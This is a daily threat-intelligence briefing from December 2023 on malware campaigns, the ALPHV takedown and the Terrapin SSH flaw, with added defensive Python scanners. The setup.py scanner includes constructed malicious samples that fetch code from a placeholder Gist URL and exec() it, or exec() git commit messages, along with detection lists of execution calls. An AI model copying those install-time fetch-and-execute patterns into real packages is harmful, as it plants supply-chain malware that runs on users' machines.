
Cyware Daily Threat Intelligence


Daily Threat Briefing Dec 20, 2023

Malware galore! JaskaGO, a newly discovered malware strain written in Go, threatens both Windows and macOS. Equipped with anti-VM checks and other evasion features, it reaches users through spear-phishing campaigns. Meanwhile, MetaStealer, built on the RedLine codebase, is gaining notoriety in the cybercriminal landscape as a tool for stealing valuable data and preparing the ground for later ransomware attacks.

GitHub has become a new hub for malware authors: adversaries were spotted abusing GitHub Gists and Git commit messages to host and distribute malicious code. Meanwhile, a malspam campaign is targeting the hospitality industry, using social engineering to deliver RedLine Stealer or Vidar Stealer.

Top Breaches Reported in the Last 24 Hours

Malware campaign steals from 40 banks

IBM uncovered a new attack campaign that uses JavaScript web injection to target users of 40 banks across North America, South America, Europe, and Japan. The injected script lets criminals modify webpage content, capture login credentials, and intercept OTPs, which they can use to log in to the victim's banking account and perform unauthorized transactions. Attackers have already compromised the banking details of over 50,000 users.

Top Malware Reported in the Last 24 Hours

Microsoft Excel exploited in malware campaign

Threat actors were found targeting vulnerable versions of Microsoft Excel to deploy Agent Tesla. The attack starts with spam emails carrying malicious attachments named with lures such as "orders" and "invoices" to deceive users. The infection chain consists of an obfuscated VBS file, a JPG file carrying a Base64-encoded DLL, and the execution of PowerShell and RegAsm.exe. The Agent Tesla payload steals browser data and credentials from mail clients and FTP applications.
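The JPG carrying a Base64-encoded DLL is the stage of this chain that a defender can hunt for in mail attachments and on disk. The scanner below is an added example written for this briefing, not code from the original report. It finds long Base64 runs in any file, tries each of the four possible alignments (a stray Base64 character in front of the payload would otherwise hide it), and reports runs that decode to a DOS "MZ" header followed by a "PE" signature. The JPG header, filler bytes and PE-shaped blob are constructed test data, not real samples.

```python
import base64
import re
from typing import List, Optional, Tuple

# A Base64 run long enough to be a payload rather than incidental text:
# 256 characters decode to 192 bytes, already bigger than a DOS header.
_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{256,}={0,2}")


def _decode_aligned(run: bytes) -> Optional[bytes]:
    """Try the four possible Base64 alignments of a run and return the decoded
    bytes of the first one that looks like a PE image, else None."""
    for shift in range(4):
        chunk = run[shift:]
        chunk = chunk[: len(chunk) - len(chunk) % 4]  # keep whole 4-char quanta
        try:
            decoded = base64.b64decode(chunk, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        # DOS header magic plus the PE signature that the DOS stub points at.
        if decoded.startswith(b"MZ") and b"PE\x00\x00" in decoded:
            return decoded
    return None


def find_embedded_pe(data: bytes) -> List[Tuple[int, int]]:
    """Return (offset, decoded_size) for every Base64 run in `data` that
    decodes to a PE image. Works on any blob, not only JPG files."""
    hits = []
    for m in _B64_RUN.finditer(data):
        decoded = _decode_aligned(m.group(0))
        if decoded is not None:
            hits.append((m.start(), len(decoded)))
    return hits


# --- constructed sample data (not real malware) --------------------------
# A PE-shaped blob: DOS header magic, the DOS stub string and a PE signature.
FAKE_PE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 16
    + b"PE\x00\x00" + b"\x00" * 400
)
JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01"
FILLER = bytes(range(256)) * 2  # binary noise; longest Base64 run is 26 chars


def build_sample(prefix: bytes = b"") -> bytes:
    """Constructed JPG-like file with the Base64 DLL appended after image data.
    `prefix` puts stray Base64 characters in front of the payload to show that
    the alignment search still finds it."""
    return JPEG_HEADER + FILLER + prefix + base64.b64encode(FAKE_PE) + b"\xff\xd9"


CLEAN_SAMPLE = JPEG_HEADER + bytes(range(256)) * 4 + b"\xff\xd9"

if __name__ == "__main__":
    for name, blob in (("dropper.jpg", build_sample()), ("photo.jpg", CLEAN_SAMPLE)):
        print(name, find_embedded_pe(blob) or "no embedded PE")
```

The 256-character threshold and the "PE" signature check are tuning choices: lower the threshold to catch chunked payloads, and expect false positives on files that legitimately embed Base64 (e-mail bodies, XML) unless the PE check stays in place.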

Law enforcement seizes ALPHV's leak site

A coordinated effort led by the FBI, with support from law enforcement agencies globally, has seized the dark web leak site of the notorious ransomware gang ALPHV, also known as BlackCat. The operation involved the disruption of ALPHV's infrastructure and the release of a decryption tool, enabling over 500 victims to restore their systems. ALPHV is responsible for compromising over 1,000 worldwide victims and targeting critical infrastructure.

MetaStealer now spreads through malicious ads

MetaStealer, which emerged in 2022, has transitioned from traditional distribution methods like malspam and compromised YouTube accounts to a malvertising campaign. Researchers from Malwarebytes discovered this shift in tactics and observed the malware being distributed through deceptive ads for popular software like Notepad++ and AnyDesk. The malware authors hinted at the release of an enhanced version in a recent interview.

Malware authors abuse GitHub

Security researchers have identified two novel techniques by which malware authors use GitHub for hosting payloads and issuing commands. The first abuses GitHub Gists, a feature that lets developers share code snippets easily; the malicious code ships inside PyPI packages posing as network-proxying libraries. The second sends commands through Git commit messages: code hidden in the package's setup.py clones a GitHub repository and executes commands taken from specific commit messages.
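Both techniques share one property a reviewer can check statically: the package's setup.py does something at install time that a build script has no reason to do, such as executing strings, spawning processes, fetching remote content or reading the git log. The scanner below is an added example for this briefing, not code from the researchers or from any of the packages; it walks the setup.py AST and flags those patterns. The three setup.py strings are constructed samples that imitate the shapes described above (the Gist URL is a placeholder, not a real one).

```python
import ast
from typing import List, Set, Tuple

GIST_HOST = "gist.github.com"
# Calls that execute a string or spawn a process from a build script.
EXEC_NAMES = {
    "exec", "eval", "os.system", "os.popen",
    "subprocess.run", "subprocess.call", "subprocess.Popen",
    "subprocess.check_output", "subprocess.check_call",
}
# Calls that pull remote content at install time.
FETCH_NAMES = {"urllib.request.urlopen", "requests.get"}


def _qualname(func: ast.expr) -> str:
    """Dotted name of a call target, e.g. 'subprocess.check_output', or ''."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        base = _qualname(func.value)
        return f"{base}.{func.attr}" if base else func.attr
    return ""


def _strings_in(node: ast.AST) -> str:
    """All string literals below `node`, joined, so ["git", "log"] reads 'git log'."""
    return " ".join(
        c.value for c in ast.walk(node)
        if isinstance(c, ast.Constant) and isinstance(c.value, str)
    )


def scan_setup_py(source: str) -> List[Tuple[int, str]]:
    """Static scan of a setup.py. Returns sorted (line, finding) pairs for
    install-time execution, remote fetches, git-log reads and Gist references."""
    findings: Set[Tuple[int, str]] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _qualname(node.func)
            if name in EXEC_NAMES:
                findings.add((node.lineno, f"code/command execution via {name}()"))
                if "git log" in _strings_in(node):
                    findings.add((node.lineno, "reads commit messages with git log"))
            elif name in FETCH_NAMES:
                findings.add((node.lineno, f"remote fetch via {name}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if GIST_HOST in node.value:
                findings.add((node.lineno, f"references {GIST_HOST}"))
    return sorted(findings)


# --- constructed samples (illustrative, not real packages) ----------------
BENIGN_SETUP = """\
from setuptools import setup, find_packages
setup(name="netproxy", version="1.0", packages=find_packages())
"""

# Second technique: the command to run comes from the newest commit message.
COMMIT_MSG_SETUP = """\
import subprocess
from setuptools import setup
cmd = subprocess.check_output(["git", "log", "-1", "--pretty=%B"]).decode()
exec(cmd)
setup(name="netproxy", version="1.0")
"""

# First technique: code is pulled from a Gist at install time (placeholder URL).
GIST_SETUP = """\
import urllib.request
from setuptools import setup
code = urllib.request.urlopen("https://gist.github.com/example/raw").read()
exec(code)
setup(name="netproxy", version="1.0")
"""

if __name__ == "__main__":
    samples = (("benign", BENIGN_SETUP), ("commit-msg", COMMIT_MSG_SETUP), ("gist", GIST_SETUP))
    for label, src in samples:
        print(label, scan_setup_py(src) or "clean")
```

Run it over the setup.py of every sdist before it is allowed into an internal mirror. The scan is deliberately name-based and will miss obfuscated call targets (getattr, base64-decoded strings), so treat a clean result as "nothing obvious", not as a verdict.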

Hospitality industry warned of malspam attacks

Sophos X-Ops issued a warning to the global hospitality industry regarding a sophisticated malspam campaign targeting hotels. The campaign employs social engineering tactics, sending hotel representatives email complaints about service problems or requests for information. These emails contain links to password-protected archives hosted on public cloud storage platforms, leading to malware such as RedLine Stealer or Vidar Stealer.

Advanced Go Malware threatens Windows and macOS

A sophisticated malware strain named JaskaGO poses a serious threat to both Windows and macOS systems. Discovered by AT&T Alien Labs, the malware shows low detection rates with traditional antivirus solutions, making it a potent threat. JaskaGO exfiltrates valuable information, including browser credentials, cryptocurrency wallet details, and sensitive user files, implements anti-VM checks, and establishes persistence through several methods.

Top Vulnerabilities Reported in the Last 24 Hours

SSH protocol flaw allows downgrade attacks

Researchers from Ruhr University Bochum identified an attack method, named Terrapin, that exploits a vulnerability in the SSH protocol's handshake. An adversary positioned between client and server injects a plaintext "ignore" message into the unencrypted part of the handshake, which lets a later encrypted message be dropped without either side noticing. The result is a downgrade of the connection's security: the attacker can force SSH clients to use weaker authentication algorithms and disable certain defense mechanisms.
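Whether a given connection is exposed depends on what the two peers negotiate, so the practical check is a look at both KEXINIT name-lists. The following checker is an added example for this briefing, not code from the researchers or from OpenSSH. It relies on facts from the public Terrapin disclosure (CVE-2023-48795) that the item above does not spell out: the attack works against chacha20-poly1305@openssh.com and against any CBC cipher combined with an encrypt-then-MAC MAC; the countermeasure ("strict kex", shipped in OpenSSH 9.6) is advertised as the pseudo-algorithms kex-strict-c-v00@openssh.com and kex-strict-s-v00@openssh.com in the KEX list and only takes effect when both sides send it. The name-lists in the block are constructed and only resemble OpenSSH defaults.

```python
from typing import Dict, List, Optional, Tuple

STRICT_KEX_CLIENT = "kex-strict-c-v00@openssh.com"
STRICT_KEX_SERVER = "kex-strict-s-v00@openssh.com"
CHACHA = "chacha20-poly1305@openssh.com"

NameLists = Dict[str, List[str]]  # keys: "kex", "ciphers", "macs"


def negotiate(client: List[str], server: List[str]) -> Optional[str]:
    """SSH algorithm negotiation (RFC 4253, section 7.1): the first entry in the
    client's list that the server also offers wins."""
    return next((alg for alg in client if alg in server), None)


def terrapin_exposure(client: NameLists, server: NameLists) -> Tuple[bool, str]:
    """Decide from both peers' KEXINIT name-lists whether the session they would
    negotiate is exposed to the Terrapin prefix-truncation attack."""
    # The strict-kex countermeasure only takes effect when BOTH peers advertise it.
    if STRICT_KEX_CLIENT in client["kex"] and STRICT_KEX_SERVER in server["kex"]:
        return False, "strict key exchange negotiated by both peers"
    cipher = negotiate(client["ciphers"], server["ciphers"])
    mac = negotiate(client["macs"], server["macs"])
    if cipher is None or mac is None:
        return False, "no common cipher or MAC; the connection would fail"
    if cipher == CHACHA:
        return True, f"{cipher} without strict kex"
    # CBC modes are only exploitable together with an encrypt-then-MAC MAC.
    if cipher.endswith("-cbc") and mac.endswith("-etm@openssh.com"):
        return True, f"{cipher} with encrypt-then-MAC {mac}"
    return False, f"{cipher}/{mac} is not affected"


# --- constructed name-lists; they resemble OpenSSH defaults but are not copies --
UNPATCHED: NameLists = {
    "kex": ["curve25519-sha256", "ecdh-sha2-nistp256", "diffie-hellman-group14-sha256"],
    "ciphers": [CHACHA, "aes128-ctr", "aes256-ctr", "aes256-gcm@openssh.com", "aes256-cbc"],
    "macs": ["umac-64-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-256"],
}


def patched(lists: NameLists, role: str) -> NameLists:
    """The same lists plus the strict-kex pseudo-algorithm for a client or server."""
    token = STRICT_KEX_CLIENT if role == "client" else STRICT_KEX_SERVER
    return {**lists, "kex": lists["kex"] + [token]}


# Unpatched server whose operator removed ChaCha20 and CBC from its cipher list.
HARDENED_SERVER: NameLists = {
    **UNPATCHED, "ciphers": ["aes256-gcm@openssh.com", "aes128-ctr", "aes256-ctr"],
}

if __name__ == "__main__":
    cases = {
        "both unpatched": (UNPATCHED, UNPATCHED),
        "both patched": (patched(UNPATCHED, "client"), patched(UNPATCHED, "server")),
        "client patched only": (patched(UNPATCHED, "client"), UNPATCHED),
        "unpatched client, hardened server": (UNPATCHED, HARDENED_SERVER),
    }
    for label, (c, s) in cases.items():
        print(f"{label}: {terrapin_exposure(c, s)}")
```

The "client patched only" case is the one worth remembering: an updated client talking to an old server still negotiates ChaCha20 without strict kex and remains exposed. Real name-lists for a server can be read from the "peer server KEXINIT proposal" lines of ssh -vv output; until both ends run strict-kex builds, removing chacha20-poly1305@openssh.com and the CBC ciphers from the server's Ciphers setting closes the exploitable combinations, as HARDENED_SERVER shows.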
